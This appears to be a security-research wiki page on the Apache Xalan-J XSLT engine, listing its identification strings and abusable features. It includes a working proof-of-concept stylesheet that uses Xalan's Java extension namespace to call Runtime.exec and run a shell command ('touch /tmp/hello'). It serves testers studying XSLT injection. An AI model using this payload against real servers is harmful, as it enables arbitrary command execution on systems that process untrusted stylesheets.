Engine_XalanJ
Xalan-J is a Java based XSLT engine by the Apache Project.
Supported version
1.0
Command line
$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
Note : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
Identification strings
| xsl:vendor-url | http://xml.apache.org/xalan-j |
|---|---|
| xsl:vendor | Apache Software Foundation |
| xsl:version | 1.0 |
Special features
- File creation
- Code execution
- JDBC connectivity
- Java properties
- CheckEnv()
CheckEnv()
The checkEnvironment() extension function (documented here), associated to the Xalan namespace, will display some information about the execution context. The output of the PoC is attached.
Java code execution
The following code will display the current date :
TODO
Execution of external commands
The following code will execute the command "touch /tmp/hello" :
<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:j="http://xml.apache.org/xalan/java"
exclude-result-prefixes="j"
version="1.0">
<xsl:template match="/">
<xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
<xsl:variable name="a" select="j:split($c, ' = ')"/>
<xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
<xsl:variable name="p" select="j:exec($r, $a )"/>
No content at the moment ...
</xsl:template>
</xsl:stylesheet>